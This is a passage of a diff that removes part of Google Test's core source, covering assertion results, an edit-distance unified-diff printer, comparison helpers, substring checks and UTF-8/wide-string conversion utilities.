-AssertionResult AssertionResult::operator!() const {
-  AssertionResult negation(!success_);
-  if (message_.get() != NULL)
-    negation << *message_;
-  return negation;
-}
-
-// Makes a successful assertion result.
-AssertionResult AssertionSuccess() {
-  return AssertionResult(true);
-}
-
-// Makes a failed assertion result.
-AssertionResult AssertionFailure() {
-  return AssertionResult(false);
-}
-
-// Makes a failed assertion result with the given failure message.
-// Deprecated; use AssertionFailure() << message.
-AssertionResult AssertionFailure(const Message& message) {
-  return AssertionFailure() << message;
-}
-
-namespace internal {
-
-namespace edit_distance {
-std::vector<EditType> CalculateOptimalEdits(const std::vector<size_t>& left,
-                                            const std::vector<size_t>& right) {
-  std::vector<std::vector<double> > costs(
-      left.size() + 1, std::vector<double>(right.size() + 1));
-  std::vector<std::vector<EditType> > best_move(
-      left.size() + 1, std::vector<EditType>(right.size() + 1));
-
-  // Populate for empty right.
-  for (size_t l_i = 0; l_i < costs.size(); ++l_i) {
-    costs[l_i][0] = static_cast<double>(l_i);
-    best_move[l_i][0] = kRemove;
-  }
-  // Populate for empty left.
-  for (size_t r_i = 1; r_i < costs[0].size(); ++r_i) {
-    costs[0][r_i] = static_cast<double>(r_i);
-    best_move[0][r_i] = kAdd;
-  }
-
-  for (size_t l_i = 0; l_i < left.size(); ++l_i) {
-    for (size_t r_i = 0; r_i < right.size(); ++r_i) {
-      if (left[l_i] == right[r_i]) {
-        // Found a match. Consume it.
-        costs[l_i + 1][r_i + 1] = costs[l_i][r_i];
-        best_move[l_i + 1][r_i + 1] = kMatch;
-        continue;
-      }
-
-      const double add = costs[l_i + 1][r_i];
-      const double remove = costs[l_i][r_i + 1];
-      const double replace = costs[l_i][r_i];
-      if (add < remove && add < replace) {
-        costs[l_i + 1][r_i + 1] = add + 1;
-        best_move[l_i + 1][r_i + 1] = kAdd;
-      } else if (remove < add && remove < replace) {
-        costs[l_i + 1][r_i + 1] = remove + 1;
-        best_move[l_i + 1][r_i + 1] = kRemove;
-      } else {
-        // We make replace a little more expensive than add/remove to lower
-        // their priority.
-        costs[l_i + 1][r_i + 1] = replace + 1.00001;
-        best_move[l_i + 1][r_i + 1] = kReplace;
-      }
-    }
-  }
-
-  // Reconstruct the best path. We do it in reverse order.
-  std::vector<EditType> best_path;
-  for (size_t l_i = left.size(), r_i = right.size(); l_i > 0 || r_i > 0;) {
-    EditType move = best_move[l_i][r_i];
-    best_path.push_back(move);
-    l_i -= move != kAdd;
-    r_i -= move != kRemove;
-  }
-  std::reverse(best_path.begin(), best_path.end());
-  return best_path;
-}
-
-namespace {
-
-// Helper class to convert string into ids with deduplication.
-class InternalStrings {
- public:
-  size_t GetId(const std::string& str) {
-    IdMap::iterator it = ids_.find(str);
-    if (it != ids_.end()) return it->second;
-    size_t id = ids_.size();
-    return ids_[str] = id;
-  }
-
- private:
-  typedef std::map<std::string, size_t> IdMap;
-  IdMap ids_;
-};
-
-}  // namespace
-
-std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<std::string>& left,
-    const std::vector<std::string>& right) {
-  std::vector<size_t> left_ids, right_ids;
-  {
-    InternalStrings intern_table;
-    for (size_t i = 0; i < left.size(); ++i) {
-      left_ids.push_back(intern_table.GetId(left[i]));
-    }
-    for (size_t i = 0; i < right.size(); ++i) {
-      right_ids.push_back(intern_table.GetId(right[i]));
-    }
-  }
-  return CalculateOptimalEdits(left_ids, right_ids);
-}
-
-namespace {
-
-// Helper class that holds the state for one hunk and prints it out to the
-// stream.
-// It reorders adds/removes when possible to group all removes before all
-// adds. It also adds the hunk header before printint into the stream.
-class Hunk {
- public:
-  Hunk(size_t left_start, size_t right_start)
-      : left_start_(left_start),
-        right_start_(right_start),
-        adds_(),
-        removes_(),
-        common_() {}
-
-  void PushLine(char edit, const char* line) {
-    switch (edit) {
-      case ' ':
-        ++common_;
-        FlushEdits();
-        hunk_.push_back(std::make_pair(' ', line));
-        break;
-      case '-':
-        ++removes_;
-        hunk_removes_.push_back(std::make_pair('-', line));
-        break;
-      case '+':
-        ++adds_;
-        hunk_adds_.push_back(std::make_pair('+', line));
-        break;
-    }
-  }
-
-  void PrintTo(std::ostream* os) {
-    PrintHeader(os);
-    FlushEdits();
-    for (std::list<std::pair<char, const char*> >::const_iterator it =
-             hunk_.begin();
-         it != hunk_.end(); ++it) {
-      *os << it->first << it->second << "\n";
-    }
-  }
-
-  bool has_edits() const { return adds_ || removes_; }
-
- private:
-  void FlushEdits() {
-    hunk_.splice(hunk_.end(), hunk_removes_);
-    hunk_.splice(hunk_.end(), hunk_adds_);
-  }
-
-  // Print a unified diff header for one hunk.
-  // The format is
-  //   "@@ -<left_start>,<left_length> +<right_start>,<right_length> @@"
-  // where the left/right parts are omitted if unnecessary.
-  void PrintHeader(std::ostream* ss) const {
-    *ss << "@@ ";
-    if (removes_) {
-      *ss << "-" << left_start_ << "," << (removes_ + common_);
-    }
-    if (removes_ && adds_) {
-      *ss << " ";
-    }
-    if (adds_) {
-      *ss << "+" << right_start_ << "," << (adds_ + common_);
-    }
-    *ss << " @@\n";
-  }
-
-  size_t left_start_, right_start_;
-  size_t adds_, removes_, common_;
-  std::list<std::pair<char, const char*> > hunk_, hunk_adds_, hunk_removes_;
-};
-
-}  // namespace
-
-// Create a list of diff hunks in Unified diff format.
-// Each hunk has a header generated by PrintHeader above plus a body with
-// lines prefixed with ' ' for no change, '-' for deletion and '+' for
-// addition.
-// 'context' represents the desired unchanged prefix/suffix around the diff.
-// If two hunks are close enough that their contexts overlap, then they are
-// joined into one hunk.
-std::string CreateUnifiedDiff(const std::vector<std::string>& left,
-                              const std::vector<std::string>& right,
-                              size_t context) {
-  const std::vector<EditType> edits = CalculateOptimalEdits(left, right);
-
-  size_t l_i = 0, r_i = 0, edit_i = 0;
-  std::stringstream ss;
-  while (edit_i < edits.size()) {
-    // Find first edit.
-    while (edit_i < edits.size() && edits[edit_i] == kMatch) {
-      ++l_i;
-      ++r_i;
-      ++edit_i;
-    }
-
-    // Find the first line to include in the hunk.
-    const size_t prefix_context = std::min(l_i, context);
-    Hunk hunk(l_i - prefix_context + 1, r_i - prefix_context + 1);
-    for (size_t i = prefix_context; i > 0; --i) {
-      hunk.PushLine(' ', left[l_i - i].c_str());
-    }
-
-    // Iterate the edits until we found enough suffix for the hunk or the input
-    // is over.
-    size_t n_suffix = 0;
-    for (; edit_i < edits.size(); ++edit_i) {
-      if (n_suffix >= context) {
-        // Continue only if the next hunk is very close.
-        std::vector<EditType>::const_iterator it = edits.begin() + edit_i;
-        while (it != edits.end() && *it == kMatch) ++it;
-        if (it == edits.end() || (it - edits.begin()) - edit_i >= context) {
-          // There is no next edit or it is too far away.
-          break;
-        }
-      }
-
-      EditType edit = edits[edit_i];
-      // Reset count when a non match is found.
-      n_suffix = edit == kMatch ? n_suffix + 1 : 0;
-
-      if (edit == kMatch || edit == kRemove || edit == kReplace) {
-        hunk.PushLine(edit == kMatch ? ' ' : '-', left[l_i].c_str());
-      }
-      if (edit == kAdd || edit == kReplace) {
-        hunk.PushLine('+', right[r_i].c_str());
-      }
-
-      // Advance indices, depending on edit type.
-      l_i += edit != kAdd;
-      r_i += edit != kRemove;
-    }
-
-    if (!hunk.has_edits()) {
-      // We are done. We don't want this hunk.
-      break;
-    }
-
-    hunk.PrintTo(&ss);
-  }
-  return ss.str();
-}
-
-}  // namespace edit_distance
-
-namespace {
-
-// The string representation of the values received in EqFailure() are already
-// escaped. Split them on escaped '\n' boundaries. Leave all other escaped
-// characters the same.
-std::vector<std::string> SplitEscapedString(const std::string& str) {
-  std::vector<std::string> lines;
-  size_t start = 0, end = str.size();
-  if (end > 2 && str[0] == '"' && str[end - 1] == '"') {
-    ++start;
-    --end;
-  }
-  bool escaped = false;
-  for (size_t i = start; i + 1 < end; ++i) {
-    if (escaped) {
-      escaped = false;
-      if (str[i] == 'n') {
-        lines.push_back(str.substr(start, i - start - 1));
-        start = i + 1;
-      }
-    } else {
-      escaped = str[i] == '\\';
-    }
-  }
-  lines.push_back(str.substr(start, end - start));
-  return lines;
-}
-
-}  // namespace
-
-// Constructs and returns the message for an equality assertion
-// (e.g. ASSERT_EQ, EXPECT_STREQ, etc) failure.
-//
-// The first four parameters are the expressions used in the assertion
-// and their values, as strings.  For example, for ASSERT_EQ(foo, bar)
-// where foo is 5 and bar is 6, we have:
-//
-//   expected_expression: "foo"
-//   actual_expression:   "bar"
-//   expected_value:      "5"
-//   actual_value:        "6"
-//
-// The ignoring_case parameter is true iff the assertion is a
-// *_STRCASEEQ*.  When it's true, the string " (ignoring case)" will
-// be inserted into the message.
-AssertionResult EqFailure(const char* expected_expression,
-                          const char* actual_expression,
-                          const std::string& expected_value,
-                          const std::string& actual_value,
-                          bool ignoring_case) {
-  Message msg;
-  msg << "Value of: " << actual_expression;
-  if (actual_value != actual_expression) {
-    msg << "\n  Actual: " << actual_value;
-  }
-
-  msg << "\nExpected: " << expected_expression;
-  if (ignoring_case) {
-    msg << " (ignoring case)";
-  }
-  if (expected_value != expected_expression) {
-    msg << "\nWhich is: " << expected_value;
-  }
-
-  if (!expected_value.empty() && !actual_value.empty()) {
-    const std::vector<std::string> expected_lines =
-        SplitEscapedString(expected_value);
-    const std::vector<std::string> actual_lines =
-        SplitEscapedString(actual_value);
-    if (expected_lines.size() > 1 || actual_lines.size() > 1) {
-      msg << "\nWith diff:\n"
-          << edit_distance::CreateUnifiedDiff(expected_lines, actual_lines);
-    }
-  }
-
-  return AssertionFailure() << msg;
-}
-
-// Constructs a failure message for Boolean assertions such as EXPECT_TRUE.
-std::string GetBoolAssertionFailureMessage(
-    const AssertionResult& assertion_result,
-    const char* expression_text,
-    const char* actual_predicate_value,
-    const char* expected_predicate_value) {
-  const char* actual_message = assertion_result.message();
-  Message msg;
-  msg << "Value of: " << expression_text
-      << "\n  Actual: " << actual_predicate_value;
-  if (actual_message[0] != '\0')
-    msg << " (" << actual_message << ")";
-  msg << "\nExpected: " << expected_predicate_value;
-  return msg.GetString();
-}
-
-// Helper function for implementing ASSERT_NEAR.
-AssertionResult DoubleNearPredFormat(const char* expr1,
-                                     const char* expr2,
-                                     const char* abs_error_expr,
-                                     double val1,
-                                     double val2,
-                                     double abs_error) {
-  const double diff = fabs(val1 - val2);
-  if (diff <= abs_error) return AssertionSuccess();
-
-  // TODO(wan): do not print the value of an expression if it's
-  // already a literal.
-  return AssertionFailure()
-      << "The difference between " << expr1 << " and " << expr2
-      << " is " << diff << ", which exceeds " << abs_error_expr << ", where\n"
-      << expr1 << " evaluates to " << val1 << ",\n"
-      << expr2 << " evaluates to " << val2 << ", and\n"
-      << abs_error_expr << " evaluates to " << abs_error << ".";
-}
-
-
-// Helper template for implementing FloatLE() and DoubleLE().
-template <typename RawType>
-AssertionResult FloatingPointLE(const char* expr1,
-                                const char* expr2,
-                                RawType val1,
-                                RawType val2) {
-  // Returns success if val1 is less than val2,
-  if (val1 < val2) {
-    return AssertionSuccess();
-  }
-
-  // or if val1 is almost equal to val2.
-  const FloatingPoint<RawType> lhs(val1), rhs(val2);
-  if (lhs.AlmostEquals(rhs)) {
-    return AssertionSuccess();
-  }
-
-  // Note that the above two checks will both fail if either val1 or
-  // val2 is NaN, as the IEEE floating-point standard requires that
-  // any predicate involving a NaN must return false.
-
-  ::std::stringstream val1_ss;
-  val1_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-          << val1;
-
-  ::std::stringstream val2_ss;
-  val2_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-          << val2;
-
-  return AssertionFailure()
-      << "Expected: (" << expr1 << ") <= (" << expr2 << ")\n"
-      << "  Actual: " << StringStreamToString(&val1_ss) << " vs "
-      << StringStreamToString(&val2_ss);
-}
-
-}  // namespace internal
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-AssertionResult FloatLE(const char* expr1, const char* expr2,
-                        float val1, float val2) {
-  return internal::FloatingPointLE<float>(expr1, expr2, val1, val2);
-}
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-AssertionResult DoubleLE(const char* expr1, const char* expr2,
-                         double val1, double val2) {
-  return internal::FloatingPointLE<double>(expr1, expr2, val1, val2);
-}
-
-namespace internal {
-
-// The helper function for {ASSERT|EXPECT}_EQ with int or enum
-// arguments.
-AssertionResult CmpHelperEQ(const char* expected_expression,
-                            const char* actual_expression,
-                            BiggestInt expected,
-                            BiggestInt actual) {
-  if (expected == actual) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   FormatForComparisonFailureMessage(expected, actual),
-                   FormatForComparisonFailureMessage(actual, expected),
-                   false);
-}
-
-// A macro for implementing the helper functions needed to implement
-// ASSERT_?? and EXPECT_?? with integer or enum arguments.  It is here
-// just to avoid copy-and-paste of similar code.
-#define GTEST_IMPL_CMP_HELPER_(op_name, op)\
-AssertionResult CmpHelper##op_name(const char* expr1, const char* expr2, \
-                                   BiggestInt val1, BiggestInt val2) {\
-  if (val1 op val2) {\
-    return AssertionSuccess();\
-  } else {\
-    return AssertionFailure() \
-        << "Expected: (" << expr1 << ") " #op " (" << expr2\
-        << "), actual: " << FormatForComparisonFailureMessage(val1, val2)\
-        << " vs " << FormatForComparisonFailureMessage(val2, val1);\
-  }\
-}
-
-// Implements the helper function for {ASSERT|EXPECT}_NE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(NE, !=)
-// Implements the helper function for {ASSERT|EXPECT}_LE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(LE, <=)
-// Implements the helper function for {ASSERT|EXPECT}_LT with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(LT, < )
-// Implements the helper function for {ASSERT|EXPECT}_GE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(GE, >=)
-// Implements the helper function for {ASSERT|EXPECT}_GT with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(GT, > )
-
-#undef GTEST_IMPL_CMP_HELPER_
-
-// The helper function for {ASSERT|EXPECT}_STREQ.
-AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                               const char* actual_expression,
-                               const char* expected,
-                               const char* actual) {
-  if (String::CStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   false);
-}
-
-// The helper function for {ASSERT|EXPECT}_STRCASEEQ.
-AssertionResult CmpHelperSTRCASEEQ(const char* expected_expression,
-                                   const char* actual_expression,
-                                   const char* expected,
-                                   const char* actual) {
-  if (String::CaseInsensitiveCStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   true);
-}
-
-// The helper function for {ASSERT|EXPECT}_STRNE.
-AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                               const char* s2_expression,
-                               const char* s1,
-                               const char* s2) {
-  if (!String::CStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  } else {
-    return AssertionFailure() << "Expected: (" << s1_expression << ") != ("
-                              << s2_expression << "), actual: \""
-                              << s1 << "\" vs \"" << s2 << "\"";
-  }
-}
-
-// The helper function for {ASSERT|EXPECT}_STRCASENE.
-AssertionResult CmpHelperSTRCASENE(const char* s1_expression,
-                                   const char* s2_expression,
-                                   const char* s1,
-                                   const char* s2) {
-  if (!String::CaseInsensitiveCStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  } else {
-    return AssertionFailure()
-        << "Expected: (" << s1_expression << ") != ("
-        << s2_expression << ") (ignoring case), actual: \""
-        << s1 << "\" vs \"" << s2 << "\"";
-  }
-}
-
-}  // namespace internal
-
-namespace {
-
-// Helper functions for implementing IsSubString() and IsNotSubstring().
-
-// This group of overloaded functions return true iff needle is a
-// substring of haystack.  NULL is considered a substring of itself
-// only.
-
-bool IsSubstringPred(const char* needle, const char* haystack) {
-  if (needle == NULL || haystack == NULL)
-    return needle == haystack;
-
-  return strstr(haystack, needle) != NULL;
-}
-
-bool IsSubstringPred(const wchar_t* needle, const wchar_t* haystack) {
-  if (needle == NULL || haystack == NULL)
-    return needle == haystack;
-
-  return wcsstr(haystack, needle) != NULL;
-}
-
-// StringType here can be either ::std::string or ::std::wstring.
-template <typename StringType>
-bool IsSubstringPred(const StringType& needle,
-                     const StringType& haystack) {
-  return haystack.find(needle) != StringType::npos;
-}
-
-// This function implements either IsSubstring() or IsNotSubstring(),
-// depending on the value of the expected_to_be_substring parameter.
-// StringType here can be const char*, const wchar_t*, ::std::string,
-// or ::std::wstring.
-template <typename StringType>
-AssertionResult IsSubstringImpl(
-    bool expected_to_be_substring,
-    const char* needle_expr, const char* haystack_expr,
-    const StringType& needle, const StringType& haystack) {
-  if (IsSubstringPred(needle, haystack) == expected_to_be_substring)
-    return AssertionSuccess();
-
-  const bool is_wide_string = sizeof(needle[0]) > 1;
-  const char* const begin_string_quote = is_wide_string ? "L\"" : "\"";
-  return AssertionFailure()
-      << "Value of: " << needle_expr << "\n"
-      << "  Actual: " << begin_string_quote << needle << "\"\n"
-      << "Expected: " << (expected_to_be_substring ? "" : "not ")
-      << "a substring of " << haystack_expr << "\n"
-      << "Which is: " << begin_string_quote << haystack << "\"";
-}
-
-}  // namespace
-
-// IsSubstring() and IsNotSubstring() check whether needle is a
-// substring of haystack (NULL is considered a substring of itself
-// only), and return an appropriate error message when they fail.
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-#if GTEST_HAS_STD_WSTRING
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-namespace internal {
-
-#if GTEST_OS_WINDOWS
-
-namespace {
-
-// Helper function for IsHRESULT{SuccessFailure} predicates
-AssertionResult HRESULTFailureHelper(const char* expr,
-                                     const char* expected,
-                                     long hr) {  // NOLINT
-# if GTEST_OS_WINDOWS_MOBILE
-
-  // Windows CE doesn't support FormatMessage.
-  const char error_text[] = "";
-
-# else
-
-  // Looks up the human-readable system message for the HRESULT code
-  // and since we're not passing any params to FormatMessage, we don't
-  // want inserts expanded.
-  const DWORD kFlags = FORMAT_MESSAGE_FROM_SYSTEM |
-                       FORMAT_MESSAGE_IGNORE_INSERTS;
-  const DWORD kBufSize = 4096;
-  // Gets the system's human readable message string for this HRESULT.
-  char error_text[kBufSize] = { '\0' };
-  DWORD message_length = ::FormatMessageA(kFlags,
-                                          0,  // no source, we're asking system
-                                          hr,  // the error
-                                          0,  // no line width restrictions
-                                          error_text,  // output buffer
-                                          kBufSize,  // buf size
-                                          NULL);  // no arguments for inserts
-  // Trims tailing white space (FormatMessage leaves a trailing CR-LF)
-  for (; message_length && IsSpace(error_text[message_length - 1]);
-          --message_length) {
-    error_text[message_length - 1] = '\0';
-  }
-
-# endif  // GTEST_OS_WINDOWS_MOBILE
-
-  const std::string error_hex("0x" + String::FormatHexInt(hr));
-  return ::testing::AssertionFailure()
-      << "Expected: " << expr << " " << expected << ".\n"
-      << "  Actual: " << error_hex << " " << error_text << "\n";
-}
-
-}  // namespace
-
-AssertionResult IsHRESULTSuccess(const char* expr, long hr) {  // NOLINT
-  if (SUCCEEDED(hr)) {
-    return AssertionSuccess();
-  }
-  return HRESULTFailureHelper(expr, "succeeds", hr);
-}
-
-AssertionResult IsHRESULTFailure(const char* expr, long hr) {  // NOLINT
-  if (FAILED(hr)) {
-    return AssertionSuccess();
-  }
-  return HRESULTFailureHelper(expr, "fails", hr);
-}
-
-#endif  // GTEST_OS_WINDOWS
-
-// Utility functions for encoding Unicode text (wide strings) in
-// UTF-8.
-
-// A Unicode code-point can have upto 21 bits, and is encoded in UTF-8
-// like this:
-//
-// Code-point length   Encoding
-//   0 -  7 bits       0xxxxxxx
-//   8 - 11 bits       110xxxxx 10xxxxxx
-//  12 - 16 bits       1110xxxx 10xxxxxx 10xxxxxx
-//  17 - 21 bits       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
-
-// The maximum code-point a one-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint1 = (static_cast<UInt32>(1) <<  7) - 1;
-
-// The maximum code-point a two-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint2 = (static_cast<UInt32>(1) << (5 + 6)) - 1;
-
-// The maximum code-point a three-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint3 = (static_cast<UInt32>(1) << (4 + 2*6)) - 1;
-
-// The maximum code-point a four-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint4 = (static_cast<UInt32>(1) << (3 + 3*6)) - 1;
-
-// Chops off the n lowest bits from a bit pattern.  Returns the n
-// lowest bits.  As a side effect, the original bit pattern will be
-// shifted to the right by n bits.
-inline UInt32 ChopLowBits(UInt32* bits, int n) {
-  const UInt32 low_bits = *bits & ((static_cast<UInt32>(1) << n) - 1);
-  *bits >>= n;
-  return low_bits;
-}
-
-// Converts a Unicode code point to a narrow string in UTF-8 encoding.
-// code_point parameter is of type UInt32 because wchar_t may not be
-// wide enough to contain a code point.
-// If the code_point is not a valid Unicode code point
-// (i.e. outside of Unicode range U+0 to U+10FFFF) it will be converted
-// to "(Invalid Unicode 0xXXXXXXXX)".
-std::string CodePointToUtf8(UInt32 code_point) {
-  if (code_point > kMaxCodePoint4) {
-    return "(Invalid Unicode 0x" + String::FormatHexInt(code_point) + ")";
-  }
-
-  char str[5];  // Big enough for the largest valid code point.
-  if (code_point <= kMaxCodePoint1) {
-    str[1] = '\0';
-    str[0] = static_cast<char>(code_point);                          // 0xxxxxxx
-  } else if (code_point <= kMaxCodePoint2) {
-    str[2] = '\0';
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xC0 | code_point);                   // 110xxxxx
-  } else if (code_point <= kMaxCodePoint3) {
-    str[3] = '\0';
-    str[2] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xE0 | code_point);                   // 1110xxxx
-  } else {  // code_point <= kMaxCodePoint4
-    str[4] = '\0';
-    str[3] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[2] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xF0 | code_point);                   // 11110xxx
-  }
-  return str;
-}
-
-// The following two functions only make sense if the system
-// uses UTF-16 for wide string encoding. All supported systems
-// with 16 bit wchar_t (Windows, Cygwin, Symbian OS) do use UTF-16.
-
-// Determines if the arguments constitute UTF-16 surrogate pair
-// and thus should be combined into a single Unicode code point
-// using CreateCodePointFromUtf16SurrogatePair.
-inline bool IsUtf16SurrogatePair(wchar_t first, wchar_t second) {
-  return sizeof(wchar_t) == 2 &&
-      (first & 0xFC00) == 0xD800 && (second & 0xFC00) == 0xDC00;
-}
-
-// Creates a Unicode code point from UTF16 surrogate pair.
-inline UInt32 CreateCodePointFromUtf16SurrogatePair(wchar_t first,
-                                                    wchar_t second) {
-  const UInt32 mask = (1 << 10) - 1;
-  return (sizeof(wchar_t) == 2) ?
-      (((first & mask) << 10) | (second & mask)) + 0x10000 :
-      // This function should not be called when the condition is
-      // false, but we provide a sensible default in case it is.
-      static_cast<UInt32>(first);
-}
-
-// Converts a wide string to a narrow string in UTF-8 encoding.
-// The wide string is assumed to have the following encoding:
-//   UTF-16 if sizeof(wchar_t) == 2 (on Windows, Cygwin, Symbian OS)
-//   UTF-32 if sizeof(wchar_t) == 4 (on Linux)
-// Parameter str points to a null-terminated wide string.
-// Parameter num_chars may additionally limit the number
-// of wchar_t characters processed. -1 is used when the entire string
-// should be processed.
-// If the string contains code points that are not valid Unicode code points
-// (i.e. outside of Unicode range U+0 to U+10FFFF) they will be output
-// as '(Invalid Unicode 0xXXXXXXXX)'. If the string is in UTF16 encoding
-// and contains invalid UTF-16 surrogate pairs, values in those pairs
-// will be encoded as individual Unicode characters from Basic Normal Plane.
-std::string WideStringToUtf8(const wchar_t* str, int num_chars) {
-  if (num_chars == -1)
-    num_chars = static_cast<int>(wcslen(str));
-
-  ::std::stringstream stream;
-  for (int i = 0; i < num_chars; ++i) {
-    UInt32 unicode_code_point;
-
-    if (str[i] == L'\0') {
-      break;
-    } else if (i + 1 < num_chars && IsUtf16SurrogatePair(str[i], str[i + 1])) {
-      unicode_code_point = CreateCodePointFromUtf16SurrogatePair(str[i],
-                                                                 str[i + 1]);
-      i++;
-    } else {
-      unicode_code_point = static_cast<UInt32>(str[i]);
-    }
-
-    stream << CodePointToUtf8(unicode_code_point);
-  }
-  return StringStreamToString(&stream);
-}
-
-// Converts a wide C string to an std::string using the UTF-8 encoding.
-// NULL will be converted to "(null)".
-std::string String::ShowWideCString(const wchar_t * wide_c_str) {
-  if (wide_c_str == NULL)  return "(null)";
-
-  return internal::WideStringToUtf8(wide_c_str, -1);
-}
-
-// Compares two wide C strings.  Returns true iff they have the same
-// content.
-//
-// Unlike wcscmp(), this function can handle NULL argument(s).  A NULL
-// C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::WideCStringEquals(const wchar_t * lhs, const wchar_t * rhs) {
-  if (lhs == NULL) return rhs == NULL;
-
-  if (rhs == NULL) return false;
-
-  return wcscmp(lhs, rhs) == 0;
-}
-
-// Helper function for *_STREQ on wide strings.
-AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                               const char* actual_expression,
-                               const wchar_t* expected,
-                               const wchar_t* actual) {
-  if (String::WideCStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   false);
-}
-
-// Helper function for *_STRNE on wide strings.
-AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                               const char* s2_expression,
-                               const wchar_t* s1,
-                               const wchar_t* s2) {
-  if (!String::WideCStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  }
-
-  return AssertionFailure() << "Expected: (" << s1_expression << ") != ("
-                            << s2_expression << "), actual: "
-                            << PrintToString(s1)
-                            << " vs " << PrintToString(s2);
-}
-
-// Compares two C strings, ignoring case.  Returns true iff they have
-// the same content.
-//
-// Unlike strcasecmp(), this function can handle NULL argument(s).  A
-// NULL C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::CaseInsensitiveCStringEquals(const char * lhs, const char * rhs) {
-  if (lhs == NULL)
-    return rhs == NULL;
-  if (rhs == NULL)
-    return false;
-  return posix::StrCaseCmp(lhs, rhs) == 0;
-}
-
-  // Compares two wide C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike wcscasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL wide C string,
-  // including the empty string.
-  // NB: The implementations on different platforms slightly differ.
-  // On windows, this method uses _wcsicmp which compares according to LC_CTYPE
-  // environment variable. On GNU platform this method uses wcscasecmp
-  // which compares according to LC_CTYPE category of the current locale.
-  // On MacOS X, it uses towlower, which also uses LC_CTYPE category of the
-  // current locale.
-bool String::CaseInsensitiveWideCStringEquals(const wchar_t* lhs,
-                                              const wchar_t* rhs) {
-  if (lhs == NULL) return rhs == NULL;
-
-  if (rhs == NULL) return false;
-
-#if GTEST_OS_WINDOWS
-  return _wcsicmp(lhs, rhs) == 0;
-#elif GTEST_OS_LINUX && !GTEST_OS_LINUX_ANDROID
-  return wcscasecmp(lhs, rhs) == 0;
-#else
-  // Android, Mac OS X and Cygwin don't define wcscasecmp.
-  // Other unknown OSes may not define it either.
-  wint_t left, right;
-  do {
-    left = towlower(*lhs++);
-    right = towlower(*rhs++);
-  } while (left && left == right);
-  return left == right;
-#endif  // OS selector
-}
-
-// Returns true iff str ends with the given suffix, ignoring case.
-// Any string is considered to end with an empty suffix.
-bool String::EndsWithCaseInsensitive(
-    const std::string& str, const std::string& suffix) {
-  const size_t str_len = str.length();
